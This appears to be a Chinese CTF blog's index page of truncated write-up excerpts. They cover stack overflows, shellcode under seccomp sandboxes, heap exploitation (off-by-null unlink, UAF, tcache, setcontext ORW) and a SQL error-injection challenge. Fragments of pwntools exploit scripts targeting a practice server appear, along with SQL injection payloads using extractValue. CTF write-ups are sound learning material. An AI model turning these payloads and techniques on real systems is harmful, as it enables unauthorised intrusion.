偏有宸机

Stackpwn1 checksec什么保护都没开，到程序里发现有个fun函数可以调用shell，那我们直接覆盖rip指向这里就可以了 EXP 123456789from pwn import *#sh = process("./pwn1")sh = remote("node3.buuoj.cn",29918)payload = "a"*23payload +=p64(0x0000000000401198)+p64(0x0000000000401186)#sh.recvuntil("put\n")sleep(2)sh.sendline(payload)sh.interactive() 这里有点不太明白，为什么直接将rip指向0x401186就不可以 warmup_csaw_2016 和上一个类似程序中有个sub_40060d的函数可以直接查看flag，控制eip指向这个函数即可 EXP 12345678from pwn import *sh = process("./warmup_ ...

F | [强网先锋]shellcode | 偏有宸机类原题，可以参考文章https://xz.aliyun.com/t/6645前半部分的汇编写法，通过retf切换到32位来执行open打开flag文件再切换到64位read将falg读取到程序中，之后的做法就要稍有改动，因为不能直接使用write，所以这里的思路就是蓝帽杯chall题目的做法，编写汇编指令逐字节比较，进行暴破 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798991001011021031041051061071081091101111121131141151161171181191201211221231241251261271281291301311321331341351361371381391 ...

程序分析checksec保护全开 且存在沙箱，禁用了execve ida分析程序 有增删改查功能的存在 但show与edit功能同样只能使用一次，且edit功能可以触发后门，在free_hook-0x10处写入0x7f delete功能free过后指针清零 add功能限制申请的堆块不能超过0x70，但是可以利用offbynull 利用思路 offbynull进行unlink 利用程序预设，先申请两个大堆块记作chunk_0和chunk_1 free掉chunk_0，利用残留main_arena 泄露libc地址 之后申请多次堆块距填满还差一个的时候，利用offbynull，形成一个可控的且处于free状态的堆块（同时对其填入main_arena+96-0x18与main_arena+96-0x10，用于unlink） 由于上面的offbynull，导致chunk_1也被影响，需要在末尾伪造size位进行修复 最后进行unlink，控制堆块落到free_hook 利用setcontext执行orw 将setcontext+53写入到free_hook 新建0x5 ...

C沙箱简介在ctf中常见的实现沙箱的机制有两种，一种是prctl函数调用，另一种就是seccomp库函数 而其一般都会禁用execve函数，使之无法直接getshell 在严格模式下甚至只支持exit()，sigreturn()，read()和write()的使用，使用其他系统调用都将会杀掉进程 对于过滤模式下，就可以指定允许使用哪些系统调用，规则是bpf，具体可以使用seccomp-tools查看 prctl函数调用可以通过第一个参数控制程序进程去做什么，该参数常见得为38和22两种情况 1prctl(38, 1LL, 0LL, 0LL, 0LL); 第一个参数为38，第二个参数为1时，禁用execve且子进程一样 1prctl(22, 2LL, &v1); 第一个参数为22 第二个参数为1时，只允许调用read/write/_exit(not exit_group)/sigreturn这几个syscall 第二个参数为2时，则为过滤模式，其中对syscall的限制通过参数3的结构体来自定义过滤规则 seccomp首先对seccomp进行初始化 1v1 = ...

Web | easy sql |直接用sqlmap跑，跑出来报错注入并且得到库名是 security 表名是 flag 测试发现information和sys都被过滤了，绕过就好了。 开始查询字段： 123Submit=%E7%99%BB%E5%BD%95&passwd=' and ((select * from (select * from security.flag a join security.flag b using (no,id))c))||'&uname=%E2%80%99 得到字段后开始查询flag：payload–> 12345Submit=%E7%99%BB%E5%BD%95&passwd='|| extractValue(1,(select `0d479ba3-d155-4d91-948b-9a786bc92dea` from flag)) ||'&uname=%E2%80%99 得到flag： | easy_source |扫描源码发现.index.php.swo备份文件： ...

题目分析存在增删改查功能 add 最大申请0x80的堆块，且不能超过16个 dele free堆块后未作清零操作，存在uaf show 只能show1次 edit 功能只能修改2次 利用思路泄露堆块基址由于程序中dele功能free掉堆块后并未对指针做清空操作，所以这里直接可以打印出safe-linking后的堆块基地址 1234567add(0x80,"a"*8) dele()show()heap_base = u64(sh.recv(6).ljust(8,"\x00"))*0x1000# heap_base = u64(sh.recv(6).ljust(8,"\x00"))<<12 log.info("heap_base => 0x%x",heap_base)tcache_addr = heap_base + 0x10 # 避过tcache的size位 绕过safe-linking及泄露main_arena利用uaf申请堆块到tcache的结构体中，这里绕过saf ...

de1ctf_2019_weapon程序分析checksec 保护全开 程序中存在增删改三个功能的函数 其中sub_b5a用于新建堆块，且堆块大小不能大于96，即无法直接泄露libc地址 sub_cbb函数用于删除堆块，free堆块后未对其清空，造成uaf漏洞 sub_d59正常对堆块进行修改，但未对堆块是否存在进行校验 利用思路首先就是要明确思路，虽然没有show函数，但殊途同归， 依旧可以先利用free掉unsortedbin的方式来得到libc基地址，进而在考虑打印出地址的办法 不过由于最大只能创建0x60的堆块，那么我们就可以考虑以overlapping的方式来创造大于0x80的堆块来得到libc地址 一、Overlapping获取main_arena地址 首先我们创建5个堆块，其中对chunk_0和chunk_1填入特定内容 12345add(0,0x10,p64(0)+p64(0x41))add(1,0x60,'a'*0x20+p64(0)+p64(0x41))add(2,0x30,'a')add(3,0x30,&#x ...

Tcache概念类似常见的fastbin、unsortedbin，但是相比他们优先级要高很多 其结构一般都会在堆块的起始位置存在一个结构体，其中包含着tcache bins的各种范围的bins数量，以及一个控制器，可以理解为是tcache的fd指针，控制着下一个堆块的地址 利用手法 tcache的范围在0x410以内，大于他后就会放到正常的unsorted中 free某个tcache超过7次，也就是将存放在tcache结构体中的该范围bins的数量占满，后续free的堆块就会放到其应该放到的地方 直接修改tcache中的数量标志位(类似 0x0700000000000000) 要先确定某范围的bins数量的标志位所在的位置 例题分析程序分析保护全开得堆题，常见的增删改查功能 add添加堆块得函数中可以看到，最多只能申请7个堆块，且每个堆块不能大于1024 主要漏洞点在delete函数，free完堆块后未对其进行清空，造成uaf漏洞 但是在初步的uaf exp写完后本地很快就通了，打远程时却发现出了问题，根本通不了。。。后面才意识到是libc版本的问题，远程的是 ...

程序分析 checksec看到程序没有开启nx保护，即我们可以在栈中执行shellcode 第一眼看伪代码以为直接输入shellcode就可以反弹shell了，不曾想竟还有一个orw_seccomp搅屎棍从中阻拦 进到该函数看，重点在prctl函数的使用，根据我百度引经据典一番操作后了解到这两句的主要作用是 禁止程序提升权限，并且禁止除open、write、read函数外的系统调用使用 利用思路既然无法直接调用system那我们就可以结合已有的条件来曲线救国，如： 使用open打开flag -> 再通过read函数将flag的内容读取到某地址中 -> 最后使用write函数打印出该地址的内容 然鹅，难点就在于我们要手写这段过程的汇编代码来读入程序中，具体系统调用方式可参考如下 函数名 EAX E****BX ECX EDX Sys_read 0x03 Unsigned int Void *buf Size Sys_write 0x04 Unsigned int Void *buf Size Sys_open 0x05 Const char * ...